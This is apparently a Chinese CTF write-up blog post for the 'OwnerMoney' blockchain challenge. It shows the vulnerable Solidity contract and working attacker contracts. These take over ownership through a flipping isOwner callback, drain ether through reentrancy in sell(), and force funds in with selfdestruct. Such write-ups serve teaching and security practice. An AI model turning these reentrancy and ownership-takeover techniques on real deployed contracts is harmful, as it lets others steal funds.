【区块链】赛宁新春战役CTF-区块链-OwnerMoney

字数统计: 584阅读时长: 3 min

 2020/03/20   Share

从2019年开始，题目逐渐向合约逆向靠拢。。

题目地址：0x40a590b70790930ceed4d148bf365eea9e8b35f4

原题代码【比赛时未放出】：

pragma solidity ^0.4.23;

interface Changing {
    function isOwner(address) view public returns (bool);
}

contract OwnerMoney {
    
    address private owner;
    address private backup;
    
    mapping(address => uint) public balanceOf;
    mapping(address => bool) public status;
    mapping(address => uint) public buyTimes;
    
    constructor() {
        owner = msg.sender;
        backup = msg.sender;
    }
    
    event pikapika_SendFlag(string b64email);
    
    modifier onlyOwner(){
        require(msg.sender == owner);
        _;
    }
    
    function payforflag(string b64email) onlyOwner public {
        
        require(buyTimes[msg.sender] >= 100);
        _init();
        buyTimes[msg.sender] = 0;
        
        address(0x4cfbdFE01DAEF460B925773754821E7461750923).transfer(address(this).balance);
        emit pikapika_SendFlag(b64email);
        
    }
    
    function _init() internal {
        owner = backup;
    }
    
    function change(address _owner) public {
        Changing tmp = Changing(msg.sender);
        if(!tmp.isOwner(_owner)){
            status[msg.sender] = tmp.isOwner(_owner);
        }
    }
    
    function change_Owner() {
        
        require(tx.origin != msg.sender);
        require(uint(msg.sender) & 0xfff == 0xfff);
        
        if(status[msg.sender] == true){
            status[msg.sender] = false;
            owner = msg.sender;
        }
    }
    
    function _transfer(address _from, address _to, uint _value) internal {
        require(_to != address(0x0));
        require(_value > 0);
        
        uint256 oldFromBalance = balanceOf[_from];
        uint256 oldToBalance = balanceOf[_to];
        
        uint256 newFromBalance =  balanceOf[_from] - _value;
        uint256 newToBalance =  balanceOf[_to] + _value;
        
        require(oldFromBalance >= _value);
        require(newToBalance > oldToBalance);
        
        balanceOf[_from] = newFromBalance;
        balanceOf[_to] = newToBalance;
        
        assert((oldFromBalance + oldToBalance) == (newFromBalance + newToBalance));
    }
    
    function transfer(address _to, uint256 _value) public returns (bool success) {
        _transfer(msg.sender, _to, _value); 
        return true;
    }
    
    function buy() payable public returns (bool success){
        require(tx.origin != msg.sender);
        require(uint(msg.sender) & 0xfff == 0xfff);
        require(buyTimes[msg.sender]==0);
        require(balanceOf[msg.sender]==0);
        require(msg.value == 1 wei);
        balanceOf[msg.sender] = 100;
        buyTimes[msg.sender] = 1;
        return true;
    }
    
    function sell(uint256 _amount) public returns (bool success){
        require(_amount >= 200);
        require(buyTimes[msg.sender] > 0);
        require(balanceOf[msg.sender] >= _amount);
        require(address(this).balance >= _amount);
        msg.sender.call.value(_amount)();
        _transfer(msg.sender, address(this), _amount);
        buyTimes[msg.sender] -= 1;
        return true;
    }
    
    function balance0f(address _address) public view returns (uint256 balance) {
        return balanceOf[_address];
    }
    
    function eth_balance() public view returns (uint256 ethBalance){
        return address(this).balance;
    }
    
}

也不是很难，题解：

contract GetMoney996{
    address public target = 0x40a590b70790930ceed4d148bf365eea9e8b35f4; // 20200307
    address public boss = 0xb0ff7cbcA44085fb2092886636d092ba8e312ffF;
    constructor() payable {
        target.call.value(1 wei)(bytes4(0xa6f2ae3a)); // buy
        target.call(bytes4(0xa9059cbb), boss, 100); // transfer
        selfdestruct(msg.sender);
    }
}

contract BigSon{
    address public target = 0x40a590b70790930ceed4d148bf365eea9e8b35f4; // 20200307
    address private owner;
    uint256 private num;
    constructor() payable{
        owner = msg.sender;
        target.call.value(1 wei)(bytes4(0xa6f2ae3a)); // buy
    }

    function be_owner() public{
        target.call(bytes4(0x1e77933e), this); // change0x03
        target.call(bytes4(0x11f776bc)); // be owner
    }

    function isOwner(address nonce) public returns(uint256){ //这里需要变换为 0x2f54bf6e
        if(num != block.number){
            num = block.number;
            return uint256(0);
        }
        return uint256(1);
    }
    
    function attack_cell_123(){
        target.call(bytes4(0xe4849b32), 200); // sell
    }
    
    function sss_done11(){
        Question(target).payforflag('ZHViaGUuc2VjQGdtYWlsLmNvbQ==');
    }
    
    function () public payable{
        target.call(bytes4(0xe4849b32), 200); // sell
    }
}

contract Question{
    function balance0f(address addr) public view returns(uint256);
    function balanceOf(address addr) public view returns(uint256);
    function status(address addr) public view returns(uint256);
    function payforflag(string) public;
    function transfer(address to, uint256 amount) public;
    
}

contract diediedie{
    constructor() payable{
        selfdestruct(0x40a590b70790930ceed4d148bf365eea9e8b35f4); 
    }
}

原文作者：Sissel

原文链接：https://sisselcbp.github.com/2020/03/20/wp-202002zhanyi-OwnerMoney/

发表日期：March 20th 2020, 12:12:12 pm

更新日期：November 4th 2020, 10:23:32 am

Next Post

【安全研究】Hackfest2020 template-injection-workshop
Previous Post

【区块链】Hitcon2019-区块链-Bank

CATALOG



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true